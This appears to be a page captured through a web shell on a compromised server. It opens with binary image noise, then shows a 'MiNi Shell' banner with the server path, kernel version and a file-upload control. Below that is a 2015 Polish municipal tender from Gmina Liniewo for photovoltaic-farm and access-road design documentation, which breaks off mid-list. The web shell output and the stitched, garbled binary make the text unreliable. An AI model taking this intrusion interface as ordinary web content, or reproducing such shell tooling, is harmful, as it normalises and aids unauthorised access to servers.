JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150818/211356-N-2015.html

<p class="kh_header"><b>Liniewo: Opracowanie dokumentacji projektowej i studium wykonalności dla budowy farmy ogniw fotowoltaicznych wraz z projektem budowy drogi dojazdowej w Liniewskich Górach</b><br>
<b>Numer ogłoszenia: 211356 - 2015; data zamieszczenia: 18.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Liniewo , ul. Dworcowa 3, 83-420 Liniewo, woj. pomorskie, tel. 058 6878520, faks 058 6878522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.liniewo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.liniewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej i studium wykonalności dla budowy farmy ogniw fotowoltaicznych wraz z projektem budowy drogi dojazdowej w Liniewskich Górach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia dla części I 

Opracowanie dokumentacji projektowej -farma
Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu dokumentacji projektowej budowy systemu paneli fotowoltaicznych w obrębie działki nr 142, obręb ewidencyjny Liniewo, Gmina Liniewo o powierzchni 2,4 ha. Należy przewidzieć maksymalne wykorzystanie powierzchni pod planowaną farmę dla uzyskania optymalnej mocy zainstalowanych urządzeń. Planowaną lokalizację farmy fotowoltaicznej prezentuje załącznik nr 1 do SIWZ. Przygotowanie i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z kartą informacji przedsięwzięcia, decyzji o ustaleniu lokalizacji celu publicznego lub warunków zabudowy. 
Zakres prac projektowych farmy fotowoltaicznej obejmuje w szczególności opracowanie: 
- mapy do celów projektowych, 
- uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia , 
- uzyskanie decyzji o warunkach zabudowy lub decyzji o ustaleniu lokalizacji celu publicznego, 
- sporządzenie opinii geotechnicznej gruntu w obrębie planowanej lokalizacji farmy fotowoltaicznej, 
uzyskanie niezbędnych opinii, pozwoleń i uzgodnień wymaganych przepisami szczegółowymi ustawy Prawo budowlane w szczególności opinii ZUD 
przygotowanie i przedstawienie Zamawiającemu do akceptacji koncepcji farmy fotowoltaicznej
projektu budowlanego,
przygotowanie wniosku o wystąpienie do stosownych organów o wydanie decyzji pozwolenia na budowę, 
- dokonanie niezbędnych uzgodnień z lokalnym dystrybutorem energii elektrycznej oraz uzyskanie warunków przyłączenia do sieci elektroenergetycznej  
- projektów wykonawczych,
- specyfikacji technicznej wykonania i odbioru robót, 
- przedmiarów oraz kosztorysów dla wszystkich opracowań i branż 
Dokumentację w formie papierowej należy dostarczyć w następującej liczbie egzemplarzy: 
- projekt budowlany - 5 egz. 
- projekty wykonawcze - 3 egz. 
- specyfikację techniczną wykonania i odbioru robót - 3 egz. 
przedmiary, kosztorysy inwestorskie - 3 egz.
opinie uzgodnienia decyzje -1 egz.
Wersję elektroniczną w/w opracowań należy dodatkowo dostarczyć w formie elektronicznej w 2 egz. na płytach CD - pliki w następujących formach: 
- teksty jako pliki w formacie doc, lub innym kompatybilnym z Word 2007, oraz pdf, 
- rysunki jako pliki w formacie dwg (do AutoCad lub innym kompatybilnym z AutoCad), oraz pdf, 
- kosztorysy w formacie Ath lub KST.

Opracowanie dokumentacji projektowej -droga.
Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu projektu budowlanego drogi dojazdowej o długości ok 0,35 km do farmy. Droga przebiega ma przez działki o nr geodezyjnym 536-1, 267-2, 147, 148, 149, obręb ewidencyjny Liniewo, gmina Liniewo. Planowany przebieg drogi prezentuje załącznik nr 1 do  SIWZ
Przygotowanie i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z kartą informacji przedsięwzięcia, decyzji o ustaleniu lokalizacji celu publicznego lub warunków zabudowy. 
Zakres prac projektowych obejmuje w szczególności opracowanie: 
- mapy do celów projektowych, 
- uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia , 
- uzyskanie decyzji o warunkach zabudowy lub decyzji o ustaleniu lokalizacji celu publicznego, 
uzyskanie niezbędnych opinii, pozwoleń i uzgodnień wymaganych przepisami szczegółowymi ustawy Prawo budowlane w szczególności opinii ZUD, pozwolenia wodonopranwego w przypadku konieczności jego uzyskania, 
 projektu budowlanego,
przygotowanie wniosku o wystąpienie do stosownych organów o wydanie decyzji pozwolenia na budowę,  
- projektów wykonawczych,
- specyfikacji technicznej wykonania i odbioru robót, 
- przedmiarów oraz kosztorysów dla wszystkich opracowań i branż 
Dokumentację w formie papierowej należy dostarczyć w następującej liczbie egzemplarzy: 
- projekt budowlany - 5 egz. 
- projekty wykonawcze - 3 egz. 
- specyfikację techniczną wykonania i odbioru robót - 3 egz. 
przedmiar, kosztorys inwestorski - 3 egz.
opinie, uzgodnienia decyzje -1 egz.
Wersję elektroniczną w-w opracowań należy dodatkowo dostarczyć w formie elektronicznej w 2 egz. na płytach CD - pliki w następujących formach: 
- teksty jako pliki w formacie doc, lub innym kompatybilnym z Word 2007, oraz pdf, 
- rysunki jako pliki w formacie dwg (do AutoCad lub innym kompatybilnym z AutoCad), oraz pdf, 
- kosztorysy w formacie Ath lub KST, 
Wykonawca jest zobowiązany do każdorazowego uaktualnienia kosztorysu inwestorskiego w przypadku jego dezaktualizacji przed terminem ogłoszenia przetargów na realizację inwestycji objętych dokumentacją stanowiącą przedmiot zamówienia. Zobowiązanie wygasa po skutecznym udzieleniu przez Zamawiającego zamówienia lub po upływie 3 lat od daty wykonania przedmiotu umowy. 
Projektant zgodnie z art. 28 ust 3 ustawy Prawo Zamówień Publicznych nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia. Jednak gdy specyfika przedmiotu zamówienia powodować będzie iż nie można opisywać przedmiotu zamówienia za pomocą dostatecznie zrozumiałych określeń to oprócz dopisania zwrotu lub równoważny należy określić parametry, funkcje itp., które będą brane pod uwagę przy ocenie czy produkt będzie równoważny. 
1.	Opracowanie studium wykonalności dla cześć II
Opracowanie studium wykonalności w celu uzyskania dofinansowania Projektu pn. Budowa farmy ogniw fotowoltaicznych wraz z budową drogi dojazdowej w Liniewskich Górach z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020  dla osi priorytetowej 10 Energia. 
Studium wykonalności musi przedstawiać możliwość realizacji projektu w kontekście analizowanych aspektów: instytucjonalnego, ekonomiczno-finansowego, prawnego, środowiskowego, technicznego oraz wykazać, że projekt jest wart dofinansowania.
Opisany w studium wykonalności projekt powinien być najlepszym z możliwych rozwiązań, umożliwiać kompleksowe dokonanie analizy projektu pod kątem potrzeb i możliwości realizacji projektu oraz jego efektywności, zapobiegać błędnemu wyborowi technologii i podnoszeniu nieracjonalnych kosztów późniejszych prac  projektowych dla nieoptymalnego wariantu, który nie uzyska dofinansowania. Studium wykonalności musi być spójne z Regionalnym Programem Operacyjnym Województwa Pomorskiego na lata 2014-2020.
Dokumentację (studium wykonalności należy wykonać w wersji papierowej w 3 egz. oraz w wersji elektronicznej - na nośniku elektronicznym, przy czym arkusze obliczeniowe do studium wykonalności powinny zawierać aktywne formuły dotyczące sporządzonej analizy finansowej i ekonomicznej w formacie Excel 2010.
Szczegółowy opis wymagań odnośnie studium wykonalności w wytycznych do  Studiów Wykonalności stanowiących załącznik do wniosku o dofinansowanie projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.10.00-9, 71.24.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania wymaganych warunków w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania wymaganych warunków w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.
Wymagane jest wykazanie przez Wykonawcę, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia. Za spełnienie niniejszego warunku uznane zostanie wykonanie usługi polegającej na:
a) dla części I 
opracowaniu jednej dokumentacji projektowej dotyczącej: budowy systemu paneli ogniw fotowoltaicznych o mocy nominalnej co najmniej 40kW  oraz  opracowaniu dokumentacji projektowej dotyczącej budowy ,przebudowy, remontu  dróg, o długości minimum 0,3 km. Zadania mogły być realizowane w ramach jednego lub dwóch zamówień. Zamawiający uzna za spełniony warunek udziału w postępowaniu w przypadku realizacji prac projektowych w ramach jednego zamówienia lub osobno dla każdego z rodzaju tj. budowy systemu paneli- ogniw fotowoltaicznych i budowy,przebudowy, remontu  dróg.
b) dla części II 
opracowaniu studium wykonalności odpowiadającego przedmiotowi zamówienia dla zadania o wartości minimum 4000 złotych brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania wymaganych warunków w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty. Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
a) Wymagania dla części I 
Wymagane jest wykazanie przez Wykonawcę, że dysponuje lub będzie dysponować na okres realizacji zamówienia osobami zdolnymi do wykonywania zamówienia, posiadającymi wymagane polskim prawem budowlanym uprawnienia danej specjalności do pełnienia samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, ze zm.) tj.: 
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności drogowej; 
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
Zamawiający dopuszcza możliwość łączenia przez jedną osobę kilku w-w funkcji, pod warunkiem posiadania przez nią wymaganych uprawnień. 
b)	Wymagania dla części II
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i wymienionych w rozdziale VI SIWZ) dołączonych do oferty.

- oświadczenie że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania wymaganych warunków w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania wymaganych warunków w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Termin wykonania zamówienia - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla części I
Zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
a)	termin wykonania zamówienia:
- wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
- ustalenie innych warunków płatności,
- konieczność uzyskania przez Zamawiającego dodatkowych decyzji np. administracyjnych lub przedłuży się okres ich uzyskania,
- wniesienie uwag i protestów dotyczących uzyskania decyzji,
- konieczność wykonania usług dodatkowych, uzupełniających lub zamiennych,
- zmiany obowiązujących przepisów.

b)	terminy płatności:
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,

c)	parametry przedmiotu zamówienia i inne:
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- aktualizacji rozwiązań technologicznych,
- zmiana kluczowego personelu,
- zmniejszenie zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w granicach uzasadnionego interesu Zamawiającego,
- powierzenia Podwykonawcy określonego zakresu usług nie wskazanych w ofercie jako planowany do powierzenia Podwykonawcom.
Dla części II
Zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
c)	termin wykonania zamówienia:
- wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
- ustalenie innych warunków płatności,
- konieczność uzyskania przez Zamawiającego dodatkowych decyzji np. administracyjnych lub przedłuży się okres ich uzyskania,
- wniesienie uwag i protestów dotyczących uzyskania decyzji,
- Dla części II przedłużający się termin zakończenia części I,
- konieczność wykonania usług dodatkowych, uzupełniających lub zamiennych,
-  zmiany obowiązujących przepisów.

d)	terminy płatności:
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,

c)	parametry przedmiotu zamówienia i inne:
- zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
- aktualizacji rozwiązań technologicznych,
- zmiana kluczowego personelu,
- zmniejszenie zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w granicach uzasadnionego interesu Zamawiającego,
- powierzenia Podwykonawcy określonego zakresu usług nie wskazanych w ofercie jako planowany do powierzenia Podwykonawcom.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.liniewo.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Liniewo, ul. Dworcowa 3, 83-420 Liniewo pok. 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2015 godzina 09:00, miejsce: Urząd Gminy Liniewo, ul. Dworcowa 3, 83-420 Liniewo pok. 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach projektu partnerskiego pn. Kościerskie Strefy Aktywności Gospodarczej  
realizowany w ramach konkursu Ministerstwa Rozwoju Regionalnego (obecne MIiR) 
 Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego 
współfinansowany ze środków Mechanizmu Finansowego EOG oraz środków krajowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dokumentacja projektowa farmy fotowoltaicznej wraz z drogą dojazdową w Liniewskich Górach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu dokumentacji projektowej budowy systemu paneli fotowoltaicznych w obrębie działki nr 142, obręb ewidencyjny Liniewo, Gmina Liniewo o powierzchni 2,4 ha. Należy przewidzieć maksymalne wykorzystanie powierzchni pod planowaną farmę dla uzyskania optymalnej mocy zainstalowanych urządzeń. Planowaną lokalizację farmy fotowoltaicznej prezentuje załącznik nr 1 do SIWZ. Przygotowanie i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z kartą informacji przedsięwzięcia, decyzji o ustaleniu lokalizacji celu publicznego lub warunków zabudowy. 
Zakres prac projektowych farmy fotowoltaicznej obejmuje w szczególności opracowanie: 
- mapy do celów projektowych, 
- uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia , 
- uzyskanie decyzji o warunkach zabudowy lub decyzji o ustaleniu lokalizacji celu publicznego, 
- sporządzenie opinii geotechnicznej gruntu w obrębie planowanej lokalizacji farmy fotowoltaicznej, 
uzyskanie niezbędnych opinii, pozwoleń i uzgodnień wymaganych przepisami szczegółowymi ustawy Prawo budowlane w szczególności opinii ZUD 
przygotowanie i przedstawienie Zamawiającemu do akceptacji koncepcji farmy fotowoltaicznej
projektu budowlanego,
przygotowanie wniosku o wystąpienie do stosownych organów o wydanie decyzji pozwolenia na budowę, 
- dokonanie niezbędnych uzgodnień z lokalnym dystrybutorem energii elektrycznej oraz uzyskanie warunków przyłączenia do sieci elektroenergetycznej , 
- projektów wykonawczych,
- specyfikacji technicznej wykonania i odbioru robót, 
- przedmiarów oraz kosztorysów dla wszystkich opracowań i branż 
